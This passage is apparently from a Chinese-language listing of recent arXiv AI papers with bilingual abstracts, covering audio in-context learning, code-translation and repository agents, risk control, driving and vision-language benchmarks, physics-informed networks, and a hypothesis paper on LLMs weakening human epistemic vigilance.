Auditory Large Language Models (LLMs) have demonstrated strong performance across a wide range of speech and audio understanding tasks. Nevertheless, they often struggle when applied to low-resource tasks. In case in-domain labeled data are scarce or mismatched with the true test distribution, direct fine-tuning can be brittle. In-Context Learning (ICL) provides a training-free, inference-time solution by adapting auditory LLMs through conditioning on a few in-domain demonstrations. In this work, we first show that $\textit{Vanilla ICL}$, improves zero-shot performance across diverse speech and audio tasks for selected models which suggest that this ICL adaptation capability can be generalized to multimodal setting. Building on this, we propose $\textbf{Meta Speech In-Context Learning (MetaSICL)}$, a post-training recipe utilizes only high resource speech data from various tasks intending to strengthen model's in-context learning capability. Experiments indicate our proposed method outperforms direct fine-tuning in low-resource scenario.

2601.18381 2026-05-27 cs.AI cs.SE 版本更新

AI Agent for Reverse-Engineering Legacy Finite-Difference Code and Translating to Devito

AI Agent 用于逆向工程遗留有限差分代码并转换为 Devito

Yinghan Hou, Zongyou Yang

发表机构 * Department of Earth Science and Engineering(地球科学与工程系) Imperial College London(帝国理工学院伦敦分校) Department of Computer Science(计算机科学系) University College London(伦敦大学学院)

AI总结 本研究提出一个集成 AI Agent 框架,结合检索增强生成(RAG)和开源大语言模型,通过多阶段迭代工作流将遗留有限差分代码转换为 Devito 环境,并引入强化学习反馈机制实现动态自适应代码翻译。

Comments 14 pages, 7 figures

详情
AI中文摘要

为了促进遗留有限差分实现向 Devito 环境的转换,本研究开发了一个集成的 AI Agent 框架。检索增强生成(RAG)和开源大语言模型通过系统混合 LangGraph 架构中的多阶段迭代工作流相结合。该 Agent 通过文档解析、结构感知分割、实体关系提取和基于 Leiden 的社区检测构建了一个广泛的 Devito 知识图谱。GraphRAG 优化增强了跨语义社区的查询性能,这些社区包括地震波模拟、计算流体动力学和性能调优库。一个逆向工程组件通过 Fortran 源代码的静态分析推导出用于 RAG 检索的三级查询策略。为了为语言模型指导提供精确的上下文信息,多阶段检索流水线执行并行搜索、概念扩展、社区级检索和语义相似性分析。代码合成受基于 Pydantic 的约束控制,以保证结构化输出和可靠性。一个全面的验证框架将传统静态分析与 G-Eval 方法相结合,涵盖执行正确性、结构健全性、数学一致性和 API 合规性。整个 Agent 工作流在 LangGraph 框架上实现,并采用并发处理以支持基于质量的迭代细化和状态感知的动态路由。主要贡献在于引入了受强化学习启发的反馈机制,实现了从静态代码翻译向动态自适应分析行为的转变。

英文摘要

To facilitate the transformation of legacy finite difference implementations into the Devito environment, this study develops an integrated AI agent framework. Retrieval-Augmented Generation (RAG) and open-source Large Language Models are combined through multi-stage iterative workflows in the system's hybrid LangGraph architecture. The agent constructs an extensive Devito knowledge graph through document parsing, structure-aware segmentation, extraction of entity relationships, and Leiden-based community detection. GraphRAG optimisation enhances query performance across semantic communities that include seismic wave simulation, computational fluid dynamics, and performance tuning libraries. A reverse engineering component derives three-level query strategies for RAG retrieval through static analysis of Fortran source code. To deliver precise contextual information for language model guidance, the multi-stage retrieval pipeline performs parallel searching, concept expansion, community-scale retrieval, and semantic similarity analysis. Code synthesis is governed by Pydantic-based constraints to guarantee structured outputs and reliability. A comprehensive validation framework integrates conventional static analysis with the G-Eval approach, covering execution correctness, structural soundness, mathematical consistency, and API compliance. The overall agent workflow is implemented on the LangGraph framework and adopts concurrent processing to support quality-based iterative refinement and state-aware dynamic routing. The principal contribution lies in the incorporation of feedback mechanisms motivated by reinforcement learning, enabling a transition from static code translation toward dynamic and adaptive analytical behavior.

2512.20957 2026-05-27 cs.SE cs.AI 版本更新

One Tool Is Enough: Reinforcement Learning for Repository-Level LLM Agents

一个工具就够了:面向仓库级LLM智能体的强化学习

Zhaoxi Zhang, Yitong Duan, Yanzhi Zhang, Yiming Xu, Zhixiang Wang, Kun Liang, Weikang Li, Jiahui Liang, Deguo Xia, Jizhou Huang, Jiyan He, Yunfang Wu

发表机构 * National Key Laboratory for Multimedia Information Processing, Peking University(信息处理国家级重点实验室,北京大学) School of Computer Science, Peking University(北京大学计算机科学学院) Zhongguancun Institute of Artificial Intelligence (ZGCI)(中关村人工智能研究院(ZGCI)) Baidu Inc(百度公司)

AI总结 提出RepoNavigator,一个仅配备单一执行感知工具(跳转到调用符号定义)的LLM智能体,通过强化学习端到端训练,在仓库级问题定位中达到最先进性能。

详情
AI中文摘要

在大型软件仓库中定位需要修改的文件和函数由于规模和结构复杂性而具有挑战性。现有的基于LLM的方法通常将其视为仓库级检索任务,并依赖多个辅助工具,这些工具常常忽略代码执行逻辑并使模型控制复杂化。我们提出RepoNavigator,一个配备单一执行感知工具的LLM智能体:跳转到调用符号的定义。这种统一设计反映了代码执行的实际流程,同时简化了工具操作。RepoNavigator通过强化学习(RL)直接从基础预训练模型进行端到端训练,不依赖闭源蒸馏。实验表明,经过RL训练的RepoNavigator实现了最先进的性能,7B模型优于14B基线,14B模型超越32B竞争对手,32B模型在大多数指标上超过闭源模型如GPT-5。这些结果证实,将单一的、结构基础的工具与RL训练相结合,为仓库级问题定位提供了高效且可扩展的解决方案。

英文摘要

Locating files and functions requiring modification in large software repositories is challenging due to their scale and structural complexity. Existing LLM-based methods typically treat this as a repository-level retrieval task and rely on multiple auxiliary tools, which often overlook code execution logic and complicate model control. We propose RepoNavigator, an LLM agent equipped with a single execution-aware tool: jumping to the definition of an invoked symbol. This unified design reflects the actual flow of code execution while simplifying tool manipulation. RepoNavigator is trained end-to-end via Reinforcement Learning (RL) directly from a base pretrained model, without relying on closed-source distillation. Experiments demonstrate that RL-trained RepoNavigator achieves state-of-the-art performance, with the 7B model outperforming 14B baselines, the 14B model surpassing 32B competitors, and the 32B model exceeding closed-source models such as GPT-5 on most metrics. These results confirm that integrating a single, structurally grounded tool with RL training provides an efficient and scalable solution for repository-level issue localization.

2512.01556 2026-05-27 cs.AI cs.CL cs.LG 版本更新

LEC: Linear Expectation Constraints for Selection-Conditioned Risk Control in Selective Prediction and Routing Systems

LEC: 选择性预测与路由系统中基于选择条件风险控制的线性期望约束

Zhiyuan Wang, Aniri, Tianlong Chen, Yue Zhang, Heng Tao Shen, Xiaoshuang Shi, Kaidi Xu

发表机构 * University of Electronic Science and Technology of China(电子科技大学) Munich Center for Machine Learning(慕尼黑机器学习中心) University of North Carolina at Chapel Hill(北卡罗来纳大学教堂山分校) Shandong University(山东大学) Tongji University(同济大学) City University of Hong Kong(香港城市大学)

AI总结 提出LEC框架,通过线性期望约束将选择性预测转化为决策问题,在可交换性假设下利用校准集计算风险约束下的保留最大化阈值,并扩展到双模型路由系统,实现选择条件误差控制。

Comments Accepted by ICML 2026 Regular

详情
AI中文摘要

基础模型常常生成不可靠的答案,而启发式不确定性估计器无法完全区分正确与错误输出,导致用户在没有统计保证的情况下接受错误答案。我们通过选择条件风险控制来解决这个问题,旨在确保接受的预测的错误概率不超过用户指定的风险水平。为此,我们提出了LEC,一个原则性框架,将选择性预测重新定义为由选择和错误指标上的线性期望约束控制的决策问题。该公式直接控制接受错误期望数与接受预测期望数之间的比率,这对应于选择条件下的边际错误概率。在可交换性下,我们推导出一个仅依赖于保留校准集的有限样本充分条件,从而能够计算风险约束下的保留最大化阈值。此外,我们将LEC扩展到双模型路由系统:如果主模型的不确定性超过其校准阈值,则输入被委托给后续模型,同时保持系统级的选择条件误差控制。在封闭式和开放式问答(QA)以及视觉问答(VQA)上的实验表明,LEC在接受的预测中维持了规定的风险水平,并且与基线相比显著提高了样本保留率。

英文摘要

Foundation models often generate unreliable answers, while heuristic uncertainty estimators fail to fully distinguish correct from incorrect outputs, causing users to accept erroneous answers without any statistical guarantee. We address this problem through selection-conditioned risk control, aiming to ensure that an accepted prediction has an error probability no larger than a user-specified risk level. To this end, we propose LEC, a principled framework that reframes selective prediction as a decision problem governed by a linear expectation constraint over selection and error indicators. This formulation directly controls the ratio between the expected number of accepted errors and the expected number of accepted predictions, which corresponds to the marginal error probability conditioned on selection. Under exchangeability, we derive a finite-sample sufficient condition that relies only on a held-out calibration set, enabling the computation of a risk-constrained, retention-maximizing threshold. Furthermore, we extend LEC to two-model routing systems: if the primary model's uncertainty exceeds its calibrated threshold, the input is delegated to a subsequent model, while maintaining system-level selection-conditioned error control. Experiments on both closed-ended and open-ended question answering (QA) and vision question answering (VQA) demonstrate that LEC maintains the prescribed risk level in accepted predictions and substantially improves sample retention compared to baselines.

2601.14702 2026-05-27 cs.AI cs.CV cs.RO 版本更新

Drive-P2D: A Progressive Perception-to-Decision Benchmark for VLMs in Autonomous Driving

Drive-P2D:自动驾驶中视觉语言模型的渐进式感知到决策基准

Zecong Tang, Zixu Wang, Yifei Wang, Weitong Lian, Tianjian Gao, Haoran Li, Tengju Ru, Lingyi Meng, Zhejun Cui, Yichen Zhu, Qi Kang, Kaixuan Wang, Yu Zhang

发表机构 * Zhejiang University(浙江大学) The University of Hong Kong(香港大学)

AI总结 提出Drive-P2D基准,通过分离推理与答案的协议,在目标、场景和决策三个层级上评估视觉语言模型的感知到决策能力,并分析错误模式。

详情
AI中文摘要

自动驾驶需要在复杂场景中实现可靠的感知和安全的决策。最近的视觉语言模型(VLM)展示了推理和泛化能力,为自动驾驶开辟了新的可能性;然而,现有的基准通常分别评估感知和决策,通过仅选择格式限制故障分析,或通过LLM评分的长格式输出引入评估偏差。为了解决这些问题,我们提出了Drive-P2D,一个渐进式感知到决策基准,包含6650个问题,涵盖目标、场景和决策三个层级。Drive-P2D采用分离的推理与答案协议:最终答案客观评分,而推理则用于分析沿渐进式感知到决策链暴露的错误模式。我们评估了所有场景和高风险场景下的主流VLM,并通过相关性分析和相似场景鲁棒性测试进一步刻画了感知到决策的能力边界。推理进一步揭示了逻辑推理错误和语义特征遗漏等故障模式,我们训练了一个轻量级分析器模型来自动化大规模推理错误模式标注。这些设计共同为构建更安全、更可靠的用于现实世界自动驾驶的VLM提供了实用见解。

英文摘要

Autonomous driving requires reliable perception and safe decision-making in complex scenarios. Recent vision-language models (VLMs) demonstrate reasoning and generalization abilities, opening new possibilities for autonomous driving; however, existing benchmarks often evaluate perception and decision-making separately, limit failure analysis with choice-only formats, or introduce evaluation bias through LLM-scored long-form outputs. To address these issues, we present Drive-P2D, a progressive perception-to-decision benchmark with 6,650 questions across Object, Scene, and Decision levels. Drive-P2D adopts a separated reasoning-and-answer protocol: final answers are scored objectively, while reasoning is analyzed to identify error modes exposed along the progressive perception-to-decision chain. We evaluate mainstream VLMs across all and high-risk scenarios, and further characterize the perception-to-decision capability boundary through correlation analysis and similar-scene robustness testing. Reasoning further exposes failure modes such as logical reasoning errors and semantic feature omissions, and we train a lightweight analyzer model to automate large-scale error-mode annotation of reasoning. Together, these designs provide practical insights for building safer and more reliable VLMs for real-world autonomous driving.

2508.03774 2026-05-27 cs.LG cs.AI 版本更新

A Physics-Informed Hierarchical Neural Network for Microwave Scattering Analysis of 3D PEC Targets

用于三维PEC目标微波散射分析的物理信息分层神经网络

Rui Zhu, Yuexing Peng, George C. Alexandropoulos, Wenbo Wang

发表机构 * Key Laboratory of Universal Wireless Communication, Ministry of Education, School of Information and Communication Engineering, Beijing University of Posts and Telecommunications(信息与通信工程学院,北京邮电大学,教育部无线通信重点实验室) Department of Informatics and Telecommunications, National and Kapodistrian University of Athens(信息与电信学院,希腊国家与卡波迪斯提亚大学)

AI总结 提出一种U形物理信息神经网络(U-PINet),结合近场图编码器和八叉树分层多尺度融合模块,通过电场积分方程残差训练,实现高效准确的三维PEC目标微波散射分析。

Comments Submitted to an IEEE Journal

详情
AI中文摘要

在微波频率下精确建模三维完美电导体(PEC)目标的散射是计算电磁学的一个基本目标,特别是在雷达截面(RCS)预测和微波散射分析中。经典求解器,如矩量法和多层快速多极子算法(MLFMA),虽然提供高物理保真度,但在涉及多次入射配置或频率的重复查询场景下变得昂贵,而纯数据驱动的代理模型通常在几何复杂目标上缺乏准确性。本文提出一种U形物理信息人工神经网络(U-PINet)用于三维微波散射分析。受MLFMA的近远场分解启发,U-PINet结合了由可学习单变量基函数参数化的近场图编码器,以及在八叉树分区上组织的分层多尺度融合模块。所提出的网络在表面配置点处针对电场积分方程的离散残差进行训练,无需参考电流标签。在多个频率和极化配置下,对典型和几何复杂的三维PEC目标进行的实验,并通过双站RCS重建评估,表明U-PINet优于代表性的物理信息基线,并在重复查询场景下相比经典MLFMA求解器实现了显著的运行时间节省。

英文摘要

Accurate modeling of scattering from three-dimensional (3D) perfectly electrically conducting (PEC) targets at microwave frequencies constitutes a fundamental objective in computational electromagnetics, particularly for radar cross section (RCS) prediction and microwave scattering analysis. Classical solvers, such as the method of moments and the Multilevel Fast Multipole Algorithm (MLFMA), although provide high physical fidelity, they become costly under scenarios of repeated queries involving many incidence configurations or frequencies, whereas purely data-driven surrogates often lack accuracy on geometrically complex targets. This paper proposes a U-shaped physics-informed artificial neural network (U-PINet) for 3D microwave scattering analysis. Inspired by the near-far field decomposition of MLFMA, U-PINet combines a near-field graph encoder, parameterized by learnable univariate basis functions, with a hierarchical multi-scale fusion module organized on an octree partition. The proposed network is trained against a discretized residual of the electric-field integral equation at surface collocation points, without requiring reference current labels. Experiments on canonical and geometrically complex 3D PEC targets, conducted under multiple frequency and polarization configurations and assessed through bistatic RCS reconstruction, showcase that U-PINet outperforms representative physics-informed baselines, and yields substantial runtime savings over the classical MLFMA solver under repeated-query scenarios.

2601.12809 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Left-Right Symmetry Breaking in CLIP-style Vision-Language Models Trained on Synthetic Spatial-Relation Data

CLIP风格视觉语言模型在合成空间关系数据训练中的左右对称性破缺

Takaki Yamamoto, Chihiro Noguchi, Toshihiro Tanizawa

发表机构 * InfoTech, Toyota Motor Corporation(丰田汽车公司信息科技部门)

AI总结 通过可控一维图像文本测试平台,研究基于Transformer的视觉语言编码器在CLIP风格对比学习下如何通过位置与标记嵌入交互产生左右关系理解,并发现标签多样性比布局多样性更关键。

Comments Accepted at ICML 2026

详情
AI中文摘要

空间理解仍然是视觉语言模型中的一个关键挑战。然而,这种理解是否真正获得,如果是,通过什么机制,目前尚不清楚。我们提出了一个可控的一维图像文本测试平台,以探究在基于Transformer的视觉和文本编码器中,使用CLIP风格的对比目标训练时,左右关系理解是如何出现的。我们在单对象和双对象场景的配对描述上端到端地训练轻量级基于Transformer的视觉和文本编码器,并评估对未见对象对的泛化能力,同时系统性地改变标签和布局多样性。我们发现对比训练学习了左右关系,并且标签多样性(而非布局多样性)是这种情况下泛化的主要驱动因素。为了获得机制性理解,我们进行了注意力分解,并表明位置嵌入和标记嵌入之间的相互作用导致了水平注意力梯度,从而打破了编码器中的左右对称性;消除这一贡献会显著降低左右辨别能力。我们的结果提供了关于CLIP风格模型何时以及如何获得关系能力的机制性见解。

英文摘要

Spatial understanding remains a key challenge in vision-language models. Yet it is still unclear whether such understanding is truly acquired, and if so, through what mechanisms. We present a controllable 1D image-text testbed to probe how left-right relational understanding emerges in Transformer-based vision and text encoders trained with a CLIP-style contrastive objective. We train lightweight Transformer-based vision and text encoders end-to-end on paired descriptions of one- and two-object scenes and evaluate generalization to unseen object pairs while systematically varying label and layout diversity. We find that contrastive training learns left-right relations and that label diversity, more than layout diversity, is the primary driver of generalization in this setting. To gain the mechanistic understanding, we perform an attention decomposition and show that interactions between positional and token embeddings induce a horizontal attention gradient that breaks left-right symmetry in the encoders; ablating this contribution substantially reduces left-right discrimination. Our results provide a mechanistic insight of when and how CLIP-style models acquire relational competence.

2601.08146 2026-05-27 cs.CL cs.AI cs.LG 版本更新

Beyond Transfer Accuracy: Faithful Circuits for Controlled Low-Resource Adaptation

超越迁移准确率:用于受控低资源适应的忠实电路

Khumaisa Nur'aini, Ayu Purwarianti, Alham Fikri Aji, Derry Wijaya

发表机构 * Monash University Indonesia(印度尼西亚墨尔本大学) Institute Teknologi Bandung(Bandung理工大学) MBZUAI(MBZUAI研究所) Boston University(波士顿大学)

AI总结 提出基于上下文分解的电路发现方法(CD-T),通过标签平衡激活均值和任务方向相关性评分实现无反事实电路发现,并利用电路目标监督微调(CT-SFT)在低资源跨语言情感迁移中最小化灾难性遗忘,优于全局微调。

详情
AI中文摘要

现有的电路发现方法依赖于具有干净反事实的模板化任务,限制了它们在多样化自然文本上的使用。我们通过标签平衡激活均值和任务方向相关性评分,将上下文分解方法适配到非结构化设置(CD-T),实现了无反事实的电路发现。我们利用这些电路进行电路目标监督微调(CT-SFT),将参数更新限制在任务相关的注意力头和层归一化上。在NusaX跨语言情感迁移上的实验表明,CT-SFT在低资源适应中极具竞争力。虽然非电路稀疏更新和全微调有时通过能力招募达到目标准确率,但CT-SFT独特地最小化灾难性遗忘,保留了源语言和相关任务的性能。在XNLI上的扩展证实了这些发现在更广泛的任务和模型家族中成立,表明电路目标适应提供了一种更安全、基于因果关系的全局微调替代方案。

英文摘要

Existing circuit discovery methods rely on templated tasks with clean counterfactuals, limiting their use on diverse natural text. We adapt Contextual Decomposition for Transformers (CD-T) for unstructured settings via label-balanced activation means and task-directional relevance scoring, enabling counterfactual-free circuit discovery. We leverage these circuits for Circuit-Targeted Supervised Fine-Tuning (CT-SFT), restricting parameter updates to task-relevant heads and LayerNorm. Experiments on NusaX cross-lingual sentiment transfer show that CT-SFT is highly competitive for low-resource adaptation. While non-circuit sparse updates and full fine-tuning sometimes match target accuracy through capacity recruitment, CT-SFT uniquely minimizes catastrophic forgetting, preserving source-language and related-task performance. Extensions to XNLI confirm these findings hold across broader tasks and model families, demonstrating that circuit-targeted adaptation provides a safer, causally grounded alternative to global fine-tuning.

2512.01572 2026-05-27 cs.LG cs.AI physics.app-ph 版本更新

Reconstructing Multi-Scale Physical Fields from Extremely Sparse Measurements with an Autoencoder-Diffusion Cascade

使用自编码器-扩散级联从极度稀疏测量中重建多尺度物理场

Letian Yi, Tingpeng Zhang, Mingyuan Zhou, Guannan Wang, Quanke Su, Zhilu Lai

发表机构 * Internet of Things Thrust(物联网方向) Intelligent Transportation Thrust(智能交通方向) Marine Hydrodynamic Research Facility(海洋流体研究设施) Department of Civil and Environmental Engineering(土木与环境工程系)

AI总结 提出Cascaded Sensing框架,通过粗尺度确定性估计和细尺度条件扩散模型级联,解决极度稀疏测量下物理场重建的不适定性和多模态后验问题。

Comments 34 pages,22 figures

详情
AI中文摘要

极端传感器稀疏性使得全场重建成为科学传感中一个根本性的不适定问题,其目标是从稀疏测量中推断物理场。在此情况下,后验严重欠约束且固有地多模态,使其近似高度病态。具体而言,确定性映射会坍塌不确定性,直接条件学习无法覆盖可能的观测条件解空间,而似然引导采样对噪声和传感器配置高度敏感。这些限制导致后验估计不稳定,并突显了以结构化方式建模不确定性的必要性。为此,我们提出了Cascaded Sensing,一个跨尺度重构后验推理的分层框架。Cas-Sensing不直接建模全场后验,而是首先通过确定性粗阶段估计器解决全局结构模糊性。一个基于神经算子的功能自编码器,使用掩码输入训练,将稀疏观测映射到粗尺度结构场,其作用类似于最大后验估计器,选择主导全局配置。该结构锚点固定了后验的主要自由度,并将问题转化为一个条件更好的残差推理任务。然后,一个条件扩散模型仅学习细化尺度的残差分布,将采样限制在合理解的稳定邻域内,并抑制观测一致模式之间的竞争。为了增强在不同传感条件下的鲁棒性,我们引入了掩码级联训练,通过中间粗重建使模型暴露于多样的稀疏观测模式。在推理过程中,流形约束引导将观测一致性作为细化机制而非全局模式选择过程来实施。

英文摘要

Extreme sensor sparsity makes full-field reconstruction a fundamentally ill-posed problem in scientific sensing,where the goal is to infer physical fields from sparse measurements.In this regime,the posterior is severely underconstrained and inherently multimodal,making its approximation highly ill-conditioned.Specifically,deterministic mappings collapse uncertainty,direct conditional learning cannot cover the space of possible observation-conditioned solutions,and likelihood-guided sampling becomes highly sensitive to noise and sensor configurations.These limitations result in unstable posterior estimates and highlight the need for modeling uncertainty in a structural manner.To this end,we propose Cascaded Sensing,a hierarchical framework that restructures posterior inference across scales.Rather than modeling the full-field posterior directly,Cas-Sensing first resolves global structural ambiguity through a deterministic coarse-stage estimator.A neural-operator-based functional autoencoder,trained with masked inputs,maps sparse observations to a coarse-scale structural field,acting analogously to a maximum a posteriori estimator that selects the dominant global configuration.This structural anchor fixes the principal degrees of freedom of the posterior and transforms the problem into a better-conditioned residual inference task.A conditional diffusion model then learns only the refined-scale residual distribution,confining sampling to a stable neighborhood of plausible solutions and suppressing competition among observation-consistent modes.To enhance robustness under varying sensing conditions,we introduce mask-cascade training,which exposes the model to diverse sparse observation patterns through intermediate coarse reconstructions.During inference,manifold-constrained guidance enforces observation consistency as a refinement mechanism rather than a global mode-selection process.

2601.07737 2026-05-27 cs.CV cs.AI 版本更新

Seeing vs. Believing: Evaluating the Language Bias of Open-Source MLLMs in Counter-Intuitive Scenes

看见 vs. 相信:评估开源多模态大模型在反直觉场景中的语言偏见

Chen Ling, Tongwei Zhang, Hanqian Li, Nai Ding

发表机构 * Zhejiang University(浙江大学) Beijing University of Posts and Telecommunications(北京邮电大学) Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州))

AI总结 为评估多模态大模型处理反直觉动作场景的能力,提出CAIT基准(400个高保真合成场景),发现开源模型因语言先验而忽视视觉证据,性能接近随机水平,而链式思维推理虽提升准确率但导致过度思考拒绝视觉内容,通过微调和结构化提示可缓解此偏见。

详情
AI中文摘要

多模态大语言模型(MLLMs)在主流视觉理解任务中表现出色,但其处理违背日常常识的动作场景的能力尚未得到充分测试。为填补这一空白,我们引入了CAIT,一个包含400个高保真合成场景的基准,专注于反直觉的视觉动作,例如“兔子在追老虎”,其中视觉证据明确违背常识预期。我们评估了人类、领先的专有模型(如Claude和Gemini)以及14个代表性的开源MLLMs。人类达到近乎完美的性能(约0.95准确率),专有模型表现出稳健的理解(达到0.88准确率),而标准的开源指令微调模型性能处于随机水平。进一步分析表明,这种失败是由强烈的语言先验驱动的:模型不信任视觉输入,而是自动用统计上常见的文本描述覆盖异常的视觉信号。尽管引入链式思维推理机制可以提高准确率,但会显著减慢响应速度并产生新的失败模式:模型过度思考场景,仅仅因为违反现实物理定律而拒绝接受实际的视觉内容。最后,我们证明有针对性的微调和结构化提示可以有效缓解这种对语言先验的依赖,使开源模型能够基于实际视觉证据准确地进行推理。

英文摘要

Multimodal Large Language Models (MLLMs) have demonstrated remarkable performance in mainstream visual understanding tasks, but their ability to process action scenes that contradict everyday common sense remains undertested. To address this gap, we introduce CAIT, a benchmark comprising 400 high-fidelity synthetic scenes focused on counter-intuitive visual actions, such as ``a rabbit is chasing a tiger'', where visual evidence explicitly contradicts common-sense expectations. We evaluate human, leading proprietary models (e.g., Claude and Gemini), and 14 representative open-source MLLMs. Humans achieve near-perfect performance (around 0.95 accuracy) and proprietary models demonstrate robust understanding (achieving up to 0.88 accuracy), standard open-source instruction-tuned models perform at the chance level. Further analysis demonstrates that this failure is driven by a strong language prior: rather than trusting the visual input, they automatically override the anomalous visual signals with statistically common text descriptions. Although introducing Chain-of-Thought reasoning mechanisms can improve accuracy, it significantly slows down the response and generates a new failure mode: models overthink the scenario and refuse to accept the actual visual content simply because it violates real-world physical laws. Finally, we demonstrate that targeted fine-tuning and structured prompting can effectively mitigate this reliance on language priors, enabling open-source models to accurately ground their reasoning in actual visual evidence.

2601.07085 2026-05-27 cs.HC cs.AI cs.CY 版本更新

The AI Cognitive Trojan Horse: How Large Language Models May Bypass Human Epistemic Vigilance

AI认知特洛伊木马:大型语言模型如何绕过人类认知警觉

Andrew D. Maynard

发表机构 * School for the Future of Innovation in Society, Arizona State University(未来创新社会研究所,亚利桑那州立大学)

AI总结 提出“认知特洛伊木马”假说,认为LLM通过优化产生的“诚实非信号”特征(流畅性、帮助性、表面无私)可能绕过人类进化出的认知警觉机制,导致用户高估其可信度。

Comments 16 pages, 20 references. v2: Added brief discussion situating "honest signals" terminology in evolutionary biology (Sec. 3), with two added citations (Zahavi 1975; Maynard Smith & Harper 2003). No changes to argument or conclusions

详情
AI中文摘要

基于大型语言模型(LLM)的对话式AI系统对人类认知提出了挑战,当前理解错误信息和说服的框架未能充分应对。本文提出,对话式AI的一个重大认知风险可能不在于不准确或有意欺骗,而在于更根本的问题:这些系统通过使其有用的优化过程,可能呈现出绕过人类进化出的评估传入信息的认知机制的特征。认知特洛伊木马假说借鉴了Sperber及其同事的认知警觉理论——即并行认知过程监控所传达的信息以寻找怀疑理由——并提出基于LLM的系统呈现出“诚实的非信号”:真实的特征(流畅性、帮助性、表面无私)缺乏人类相应特征所携带的信息等价物,因为在人类中这些特征的产生成本高昂,而在LLM中它们在计算上微不足道。识别出四种潜在的绕过机制:与理解脱钩的处理流畅性、无相应利害关系的信任-能力呈现、将评估本身委托给AI的认知卸载,以及系统性地产生谄媚的优化动态。该框架产生了可检验的预测,包括一个反直觉的推测:认知复杂的用户可能更容易受到AI介导的认知影响。这将AI安全重新定义为部分校准问题——使人类的评估反应与AI生成内容的实际认知状态对齐——而不仅仅是防止欺骗的问题。

英文摘要

Large language model (LLM)-based conversational AI systems present a challenge to human cognition that current frameworks for understanding misinformation and persuasion do not adequately address. This paper proposes that a significant epistemic risk from conversational AI may lie not in inaccuracy or intentional deception, but in something more fundamental: these systems may be configured, through optimization processes that make them useful, to present characteristics that bypass the cognitive mechanisms humans evolved to evaluate incoming information. The Cognitive Trojan Horse hypothesis draws on Sperber and colleagues' theory of epistemic vigilance -- the parallel cognitive process monitoring communicated information for reasons to doubt -- and proposes that LLM-based systems present 'honest non-signals': genuine characteristics (fluency, helpfulness, apparent disinterest) that fail to carry the information equivalent human characteristics would carry, because in humans these are costly to produce while in LLMs they are computationally trivial. Four mechanisms of potential bypass are identified: processing fluency decoupled from understanding, trust-competence presentation without corresponding stakes, cognitive offloading that delegates evaluation itself to the AI, and optimization dynamics that systematically produce sycophancy. The framework generates testable predictions, including a counterintuitive speculation that cognitively sophisticated users may be more vulnerable to AI-mediated epistemic influence. This reframes AI safety as partly a problem of calibration -- aligning human evaluative responses with the actual epistemic status of AI-generated content -- rather than solely a problem of preventing deception.

2601.05899 2026-05-27 cs.AI 版本更新

TowerMind: A Tower Defence Game Learning Environment and Benchmark for LLM as Agents

TowerMind: 一个用于LLM作为智能体的塔防游戏学习环境与基准

Dawei Wang, Chengming Zhou, Di Zhao, Xinyuan Liu, Marci Chi Ma, Gary Ushaw, Richard Davison

发表机构 * Newcastle University(新castle大学) University of Auckland(奥克兰大学)

AI总结 本文提出TowerMind,一个基于塔防子类型的轻量级、多模态游戏环境,用于评估大语言模型在长期规划和决策中的能力,并揭示其与人类专家的性能差距及关键局限性。

Comments AAAI 2026 Oral

详情
AI中文摘要

近年来,大语言模型(LLM)的突破性进展使其成为智能体的一种有前景的范式,其中长期规划和决策作为适应不同场景和任务的核心通用能力逐渐凸显。实时策略(RTS)游戏因其固有的游戏玩法需要宏观战略规划和微观战术调整与行动执行,成为评估这两种能力的理想测试平台。现有的基于RTS游戏的环境要么计算需求较高,要么缺乏对文本观察的支持,这限制了RTS游戏在LLM评估中的应用。受此启发,我们提出了TowerMind,一种基于RTS游戏子类型——塔防(TD)的新型环境。TowerMind保留了RTS游戏评估LLM的关键优势,同时具有低计算需求和多模态观察空间,包括基于像素、文本和结构化游戏状态的表示。此外,TowerMind支持模型幻觉评估,并提供高度的可定制性。我们设计了五个基准关卡,以评估几种广泛使用的LLM在不同多模态输入设置下的表现。结果揭示了LLM与人类专家在能力和幻觉维度上的明显性能差距。实验进一步突出了LLM行为的关键局限性,例如规划验证不足、决策缺乏多终性以及行动使用效率低下。我们还评估了两种经典强化学习算法:Ape-X DQN和PPO。通过提供轻量级和多模态设计,TowerMind补充了现有的基于RTS游戏的环境格局,并为AI智能体领域引入了一个新的基准。源代码已在GitHub上公开(https://github.com/tb6147877/TowerMind)。

英文摘要

Recent breakthroughs in Large Language Models (LLMs) have positioned them as a promising paradigm for agents, with long-term planning and decision-making emerging as core general-purpose capabilities for adapting to diverse scenarios and tasks. Real-time strategy (RTS) games serve as an ideal testbed for evaluating these two capabilities, as their inherent gameplay requires both macro-level strategic planning and micro-level tactical adaptation and action execution. Existing RTS game-based environments either suffer from relatively high computational demands or lack support for textual observations, which has constrained the use of RTS games for LLM evaluation. Motivated by this, we present TowerMind, a novel environment grounded in the tower defense (TD) subgenre of RTS games. TowerMind preserves the key evaluation strengths of RTS games for assessing LLMs, while featuring low computational demands and a multimodal observation space, including pixel-based, textual, and structured game-state representations. In addition, TowerMind supports the evaluation of model hallucination and provides a high degree of customizability. We design five benchmark levels to evaluate several widely used LLMs under different multimodal input settings. The results reveal a clear performance gap between LLMs and human experts across both capability and hallucination dimensions. The experiments further highlight key limitations in LLM behavior, such as inadequate planning validation, a lack of multifinality in decision-making, and inefficient action use. We also evaluate two classic reinforcement learning algorithms: Ape-X DQN and PPO. By offering a lightweight and multimodal design, TowerMind complements the existing RTS game-based environment landscape and introduces a new benchmark for the AI agent field. The source code is publicly available on GitHub(https://github.com/tb6147877/TowerMind).

2601.03525 2026-05-27 cs.LG cs.AI 版本更新

Beyond Binary: Turning Partial Success into Dense Verifiable Rewards for Reinforcement Learning in Code Generation

超越二元:将部分成功转化为代码生成中强化学习的密集可验证奖励

Longwen Wang, Yirui Liu, Xuan'er Wu, Xiaohui Hu, Yuankai Fan, Kaidong Yu, Qizhen Weng, Wei Xi, Xuelong Li

发表机构 * Institute of Artificial Intelligence, China Telecom (TeleAI)(中国电信人工智能研究院(TeleAI)) Xingchen AGI Lab, China Telecom Artificial Intelligence Technology (Beijing) Co., Ltd(中国电信人工智能技术(北京)有限公司Xingchen AGI实验室) National Key Laboratory of Human-Machine Hybrid Augmented Intelligence, Xi’an Jiaotong University(人机混合增强智能国家重点实验室,西安交通大学)

AI总结 提出VeRPO框架,利用代码测试的部分成功作为可验证密集奖励,通过动态密度校准局部奖励修正基数偏差,并与全局执行结果结合,提升代码生成强化学习的性能。

详情
AI中文摘要

